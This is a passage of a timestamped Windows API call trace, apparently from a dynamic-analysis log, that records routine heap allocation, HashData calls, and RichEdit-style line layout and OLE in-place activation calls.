(HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0162.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db358 [0162.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9d90 [0162.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9f20 [0162.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ca0 [0162.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9de0 [0162.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6caab0 [0162.083] LsFetchAppendToCurrentSubline () returned 0x0 [0162.083] LsFinishCurrentSubline () returned 0x0 [0162.084] LssbGetObjDimSubline () returned 0x0 [0162.084] LsdnSubmitSublines () returned 0x0 [0162.084] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9e30 [0162.084] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6c80 [0162.084] LsdnFinishRegular () returned 0x0 [0162.084] LsDisplayLine () returned 0x0 [0162.084] LssbFDonePresSubline () returned 0x0 [0162.084] LsDisplaySubline () returned 0x0 [0162.084] GetSysColor (nIndex=8) returned 0x0 [0162.085] GetSysColor (nIndex=8) returned 0x0 [0162.086] LsDestroyLine () returned 0x0 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e30 | out: hHeap=0x5e0000) returned 1 [0162.086] LsDestroySubline () returned 0x0 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ed0 | out: hHeap=0x5e0000) returned 1 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9db8 | out: hHeap=0x5e0000) returned 1 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db358 | out: hHeap=0x5e0000) returned 1 [0162.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f20 | out: hHeap=0x5e0000) returned 1 [0162.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d90 | out: hHeap=0x5e0000) returned 1 [0162.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ca0 | out: hHeap=0x5e0000) returned 1 [0162.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9de0 | out: hHeap=0x5e0000) returned 1 [0162.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9effac8 | out: hHeap=0x5e0000) returned 1 [0162.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6caab0 | out: hHeap=0x5e0000) returned 1 [0162.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0162.095] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa390) returned 0x0 [0162.095] LsSetDoc () returned 0x0 [0162.095] LsCreateLine () returned 0x0 [0162.095] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.095] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.096] LsdnFinishRegular () returned 0x0 [0162.096] LsDisplayLine () returned 0x0 [0162.096] IOleInPlaceFrame:SetMenu (This=0xd90600, hmenuShared=0x814c, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0162.096] LsDestroyLine () returned 0x0 [0162.096] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0162.096] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.096] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197428, cbHash=0x2 | out: pbHash=0x197428) returned 0x0 [0162.096] HashData (in: pbData=0x197424, cbData=0x4, pbHash=0x197430, cbHash=0x2 | out: pbHash=0x197430) returned 0x0 [0162.096] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19742c, cbHash=0x2 | out: pbHash=0x19742c) returned 0x0 [0162.096] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.096] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.096] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197428, cbHash=0x2 | out: pbHash=0x197428) returned 0x0 [0162.097] HashData (in: pbData=0x197424, cbData=0x4, pbHash=0x197430, cbHash=0x2 | out: pbHash=0x197430) returned 0x0 [0162.097] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19742c, cbHash=0x2 | out: pbHash=0x19742c) returned 0x0 [0162.097] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.097] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.097] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197428, cbHash=0x2 | out: pbHash=0x197428) returned 0x0 [0162.097] HashData (in: pbData=0x197424, cbData=0x4, pbHash=0x197430, cbHash=0x2 | out: pbHash=0x197430) returned 0x0 [0162.097] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19742c, cbHash=0x2 | out: pbHash=0x19742c) returned 0x0 [0162.097] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.097] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.097] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197428, cbHash=0x2 | out: pbHash=0x197428) returned 0x0 [0162.097] HashData (in: pbData=0x197424, cbData=0x4, pbHash=0x197430, cbHash=0x2 | out: pbHash=0x197430) returned 0x0 [0162.097] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19742c, cbHash=0x2 | out: pbHash=0x19742c) returned 0x0 [0162.097] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.098] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.098] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.098] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197428, cbHash=0x2 | out: pbHash=0x197428) returned 0x0 [0162.098] HashData (in: pbData=0x197424, cbData=0x4, pbHash=0x197430, cbHash=0x2 | out: pbHash=0x197430) returned 0x0 [0162.098] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19742c, cbHash=0x2 | out: pbHash=0x19742c) returned 0x0 [0162.099] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.099] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.099] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197428, cbHash=0x2 | out: pbHash=0x197428) returned 0x0 [0162.099] HashData (in: pbData=0x197424, cbData=0x4, pbHash=0x197430, cbHash=0x2 | out: pbHash=0x197430) returned 0x0 [0162.099] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19742c, cbHash=0x2 | out: pbHash=0x19742c) returned 0x0 [0162.099] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.099] LsSetDoc () returned 0x0 [0162.099] LsCreateLine () returned 0x0 [0162.100] LsDisplayLine () returned 0x0 [0162.100] GetSysColor (nIndex=8) returned 0x0 [0162.100] GetSysColor (nIndex=8) returned 0x0 [0162.101] GetSysColor (nIndex=8) returned 0x0 [0162.101] LsDestroyLine () returned 0x0 [0162.101] LsSetDoc () returned 0x0 [0162.101] LsCreateLine () returned 0x0 [0162.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.102] LsCreateSubline () returned 0x0 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x9eff618 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ed0 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ca0 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db748 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9de0 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9cc8 [0162.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9e80 [0162.103] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9cf0 [0162.103] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6caab0 [0162.103] LsFetchAppendToCurrentSubline () returned 0x0 [0162.103] LsFinishCurrentSubline () returned 0x0 [0162.103] LssbGetObjDimSubline () returned 0x0 [0162.105] LsdnSubmitSublines () returned 0x0 [0162.105] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9e30 [0162.106] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6d60 [0162.106] LsdnFinishRegular () returned 0x0 [0162.106] LsDisplayLine () returned 0x0 [0162.106] LssbFDonePresSubline () returned 0x0 [0162.106] LsDisplaySubline () returned 0x0 [0162.106] GetSysColor (nIndex=8) returned 0x0 [0162.107] GetSysColor (nIndex=8) returned 0x0 [0162.107] LsDestroyLine () returned 0x0 [0162.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e30 | out: hHeap=0x5e0000) returned 1 [0162.108] LsDestroySubline () returned 0x0 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ed0 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ca0 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db748 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9cc8 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9de0 | out: hHeap=0x5e0000) returned 1 [0162.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e80 | out: hHeap=0x5e0000) returned 1 [0162.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9cf0 | out: hHeap=0x5e0000) returned 1 [0162.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eff618 | out: hHeap=0x5e0000) returned 1 [0162.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6caab0 | out: hHeap=0x5e0000) returned 1 [0162.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0162.110] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa390) returned 0x0 [0162.110] LsSetDoc () returned 0x0 [0162.110] LsCreateLine () returned 0x0 [0162.110] LsDisplayLine () returned 0x0 [0162.110] GetSysColor (nIndex=8) returned 0x0 [0162.111] GetSysColor (nIndex=8) returned 0x0 [0162.112] LsDestroyLine () returned 0x0 [0162.112] LsSetDoc () returned 0x0 [0162.112] LsCreateLine () returned 0x0 [0162.112] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.112] LsCreateSubline () returned 0x0 [0162.112] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x9effc30 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ea8 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9f20 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2c68 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db358 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9de0 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9e30 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9d18 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ed0 [0162.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6caab0 [0162.113] LsFetchAppendToCurrentSubline () returned 0x0 [0162.114] LsFinishCurrentSubline () returned 0x0 [0162.114] LssbGetObjDimSubline () returned 0x0 [0162.114] LsdnSubmitSublines () returned 0x0 [0162.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9cc8 [0162.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6c80 [0162.114] LsdnFinishRegular () returned 0x0 [0162.114] LsDisplayLine () returned 0x0 [0162.114] LssbFDonePresSubline () returned 0x0 [0162.114] LsDisplaySubline () returned 0x0 [0162.114] GetSysColor (nIndex=8) returned 0x0 [0162.115] GetSysColor (nIndex=8) returned 0x0 [0162.116] LsDestroyLine () returned 0x0 [0162.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9cc8 | out: hHeap=0x5e0000) returned 1 [0162.116] LsDestroySubline () returned 0x0 [0162.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ea8 | out: hHeap=0x5e0000) returned 1 [0162.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f20 | out: hHeap=0x5e0000) returned 1 [0162.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2c68 | out: hHeap=0x5e0000) returned 1 [0162.117] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db358 | out: hHeap=0x5e0000) returned 1 [0162.117] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e30 | out: hHeap=0x5e0000) returned 1 [0162.117] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9de0 | out: hHeap=0x5e0000) returned 1 [0162.117] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d18 | out: hHeap=0x5e0000) returned 1 [0162.117] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ed0 | out: hHeap=0x5e0000) returned 1 [0162.117] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9effc30 | out: hHeap=0x5e0000) returned 1 [0162.118] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6caab0 | out: hHeap=0x5e0000) returned 1 [0162.118] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0162.118] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa390) returned 0x0 [0162.118] LsSetDoc () returned 0x0 [0162.118] LsCreateLine () returned 0x0 [0162.118] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.118] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.119] LsdnFinishRegular () returned 0x0 [0162.119] LsDisplayLine () returned 0x0 [0162.119] IOleInPlaceFrame:SetMenu (This=0xd90620, hmenuShared=0x74cc, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0162.119] GetSysColor (nIndex=8) returned 0x0 [0162.119] LsDestroyLine () returned 0x0 [0162.120] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0162.120] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.120] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197580, cbHash=0x2 | out: pbHash=0x197580) returned 0x0 [0162.120] HashData (in: pbData=0x19757c, cbData=0x4, pbHash=0x197588, cbHash=0x2 | out: pbHash=0x197588) returned 0x0 [0162.121] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197584, cbHash=0x2 | out: pbHash=0x197584) returned 0x0 [0162.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.121] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.121] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197580, cbHash=0x2 | out: pbHash=0x197580) returned 0x0 [0162.121] HashData (in: pbData=0x19757c, cbData=0x4, pbHash=0x197588, cbHash=0x2 | out: pbHash=0x197588) returned 0x0 [0162.121] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197584, cbHash=0x2 | out: pbHash=0x197584) returned 0x0 [0162.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.121] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.121] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197580, cbHash=0x2 | out: pbHash=0x197580) returned 0x0 [0162.121] HashData (in: pbData=0x19757c, cbData=0x4, pbHash=0x197588, cbHash=0x2 | out: pbHash=0x197588) returned 0x0 [0162.121] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197584, cbHash=0x2 | out: pbHash=0x197584) returned 0x0 [0162.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.121] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.121] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197580, cbHash=0x2 | out: pbHash=0x197580) returned 0x0 [0162.122] HashData (in: pbData=0x19757c, cbData=0x4, pbHash=0x197588, cbHash=0x2 | out: pbHash=0x197588) returned 0x0 [0162.122] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197584, cbHash=0x2 | out: pbHash=0x197584) returned 0x0 [0162.122] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.122] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.123] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.123] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197580, cbHash=0x2 | out: pbHash=0x197580) returned 0x0 [0162.123] HashData (in: pbData=0x19757c, cbData=0x4, pbHash=0x197588, cbHash=0x2 | out: pbHash=0x197588) returned 0x0 [0162.123] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197584, cbHash=0x2 | out: pbHash=0x197584) returned 0x0 [0162.123] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.123] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.123] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197580, cbHash=0x2 | out: pbHash=0x197580) returned 0x0 [0162.123] HashData (in: pbData=0x19757c, cbData=0x4, pbHash=0x197588, cbHash=0x2 | out: pbHash=0x197588) returned 0x0 [0162.123] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197584, cbHash=0x2 | out: pbHash=0x197584) returned 0x0 [0162.123] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.123] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.123] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198408, cbHash=0x2 | out: pbHash=0x198408) returned 0x0 [0162.123] HashData (in: pbData=0x198404, cbData=0x4, pbHash=0x198410, cbHash=0x2 | out: pbHash=0x198410) returned 0x0 [0162.124] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19840c, cbHash=0x2 | out: pbHash=0x19840c) returned 0x0 [0162.124] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.142] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.142] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198408, cbHash=0x2 | out: pbHash=0x198408) returned 0x0 [0162.142] HashData (in: pbData=0x198404, cbData=0x4, pbHash=0x198410, cbHash=0x2 | out: pbHash=0x198410) returned 0x0 [0162.142] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19840c, cbHash=0x2 | out: pbHash=0x19840c) returned 0x0 [0162.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.143] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.143] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198408, cbHash=0x2 | out: pbHash=0x198408) returned 0x0 [0162.143] HashData (in: pbData=0x198404, cbData=0x4, pbHash=0x198410, cbHash=0x2 | out: pbHash=0x198410) returned 0x0 [0162.143] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19840c, cbHash=0x2 | out: pbHash=0x19840c) returned 0x0 [0162.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.143] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.143] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198408, cbHash=0x2 | out: pbHash=0x198408) returned 0x0 [0162.143] HashData (in: pbData=0x198404, cbData=0x4, pbHash=0x198410, cbHash=0x2 | out: pbHash=0x198410) returned 0x0 [0162.143] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19840c, cbHash=0x2 | out: pbHash=0x19840c) returned 0x0 [0162.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.144] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.144] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.144] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198408, cbHash=0x2 | out: pbHash=0x198408) returned 0x0 [0162.144] HashData (in: pbData=0x198404, cbData=0x4, pbHash=0x198410, cbHash=0x2 | out: pbHash=0x198410) returned 0x0 [0162.144] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19840c, cbHash=0x2 | out: pbHash=0x19840c) returned 0x0 [0162.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.145] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198408, cbHash=0x2 | out: pbHash=0x198408) returned 0x0 [0162.145] HashData (in: pbData=0x198404, cbData=0x4, pbHash=0x198410, cbHash=0x2 | out: pbHash=0x198410) returned 0x0 [0162.145] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x19840c, cbHash=0x2 | out: pbHash=0x19840c) returned 0x0 [0162.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.145] LsSetDoc () returned 0x0 [0162.145] LsCreateLine () returned 0x0 [0162.145] LsDisplayLine () returned 0x0 [0162.145] GetSysColor (nIndex=8) returned 0x0 [0162.146] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.146] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.146] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.146] GetSysColor (nIndex=8) returned 0x0 [0162.146] LsDestroyLine () returned 0x0 [0162.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.147] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0162.147] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0162.147] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0162.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.147] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0162.147] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0162.147] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0162.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.147] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0162.147] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0162.147] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0162.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.147] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0162.147] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0162.147] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0162.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.148] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.148] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.148] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0162.148] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0162.148] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0162.149] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: 